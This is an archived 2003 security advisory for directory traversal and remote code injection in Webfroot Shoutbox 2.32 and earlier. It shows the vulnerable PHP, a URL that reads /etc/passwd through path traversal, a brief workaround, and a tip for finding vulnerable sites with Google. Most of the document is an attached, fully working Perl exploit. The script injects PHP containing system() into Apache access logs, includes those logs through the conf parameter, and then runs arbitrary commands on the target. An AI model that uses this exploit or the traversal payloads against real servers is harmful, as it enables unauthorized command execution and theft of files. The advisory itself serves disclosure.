Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: bt313.txt

Webfroot Shoutbox 2.32 directory traversal and code injection.





--------------080107090307080103070204
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Products: Webfroot Shoutbox v 2.32 and below (http://shoutbox.sf.net)
Date: 09 May 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:	sk_at_scan-associates.net 
		shaharil_at_scan-associates.net 
		munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Webfroot Shoutbox 2.32 and below directory traversal and code injection.

Description
===========
Webfroot Shoutbox is PHP script released under the GPL. Also known as a tagboard 
or a blabbox, shoutboxes allow visitors to your website to leave messages to 
other visitors quickly and easily.

Details
=======
User can view any readable file on system where webfroot shoutbox is running using
$conf variable.

i) Shoutbox v2.32

shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
   $conf="shoutboxconf.php";
} else {
   # michel v was there 
   $conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting
   $conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting
}

require_once ($conf);
-------------------------------------------------------------------

ii) Shoutbox v2.31

shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
   $conf="shoutboxconf.php";
}

require_once ($conf);
--------------------------------------------------------------------

Proof of concept
================

a) View any readable file
	http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd

b) Remote command execution
	i)  for version 2.31 user can remotely include file.
	ii) version 2.32 user can use apache access_log to include php code
		[see attachment]
    

Workaround
==========
Append to line 48 of shoutbox.php
	$conf = str_replace('./', '', $conf); // to avoid directory traversal


Tips
====
Search for ":: Shoutbox" at www.google.com can easily identify vulnerable site (129,000 result)








--------------080107090307080103070204
Content-Type: application/x-perl;
 name="jeritan_batinku.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="jeritan_batinku.pl"

#!/usr/bin/perl
#
# Webfroot Shoutbox < 2.32 on apache exploit
# by pokleyzz of d'scan clanz
# 
# Greet: 
#	tynon, sk ,wanvadder,  flyguy, sutan ,spoonfork, tenukboncit, kerengge_kurus , 
#	s0cket370 , b0iler and d'scan clan.
#
# Shout  to:
#	 #vuln , #mybsd , #mylinux 
#
# Just for fun :). Weekend stuff ..
#

use IO::Socket;

my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (	
		"/etc/httpd/logs/acces_log",
		"/etc/httpd/logs/acces.log",
		"/var/www/logs/access_log",
		"/var/www/logs/access.log",
		"/usr/local/apache/logs/access_log",
		"/usr/local/apache/logs/access.log",
		"/var/log/apache/access_log",
		"/var/log/apache/access.log",
		"/var/log/httpd/access_log",
		"/var/log/httpd/access.log",
		#"D:/apps/Apache Group/Apache2/logs/access.log"	
	);
	
my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?></pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
my $conn;


if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
	$type = $ARGV[0];	
}
else {
	print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of d' scan clan\n\n";
	print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path] [port]\n";
	print "\ttype\tx = exploit | r = run command (after run with x option)\n";
	print "\thost\thostname\n";
	print "\tcommand\tcommand to execute on remote server\n";
	print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
	print "\tport\tport number\n";
	exit;
}

if ($ARGV[1]){
	$host = $ARGV[1];	
}

if ($ARGV[2]){
	$cmd = $ARGV[2];	
}
if ($ARGV[3]){
	$shoutboxpath = $ARGV[3];	
}
if ($ARGV[4]){
	$port = int($ARGV[4]);	
}

$cmd =~ s/ /+/g;

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub connect_end {
	#print "[x] Close connection\n";
	close($conn);
}

sub exploit {
	my $access_log = $_[0];
	my $result = "";
	$access_log =~ s/ /+/g;
	my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\nHost: $host\nConnection: Close\n\n";
	print "$query";
	print "[x] Access log : ", $access_log ,"\n";
	&connect_to;
	print $conn $query;
	while ($line = <$conn>) { 
		$result = $line;
		#print $result;
	};
	&connect_end;
	
}

sub run_cmd {
	my $conf="/tmp/.ex";
	#my $conf="d:/tmp/.ex";
	my $result = "";
	my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\nHost: $host\nConnection: Close\n\n";
	
	print "[x] Run command ...\n";
	&connect_to;
	print $conn $query;
	while ($line = <$conn>) { 
		$result .= $line;
	};
	&connect_end;
	if ($result =~ /Result:/){
		print $result;
	} else {
		print $result;
		print "[*] Failed ...";
	}		

}

sub insert_code {
	my $result = "";
	print "[x] Access log : ", $access_log ,"\n";
	print "[x] Insert php code into apache access log ...\n";
	&connect_to;
	print $conn "$qinit";
	while ($line = <$conn>) { 
		$result .= $line;
	};
	&connect_end;
	print $result;	
}

if ($type eq "x"){
	&insert_code;
	print "[x] Trying to exploit ...\n";
	for ($i = 0;$i <= $#logs; $i++){
		&exploit($logs[$i]);
	}
	&run_cmd;
} else {
	&run_cmd;
}


--------------080107090307080103070204--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH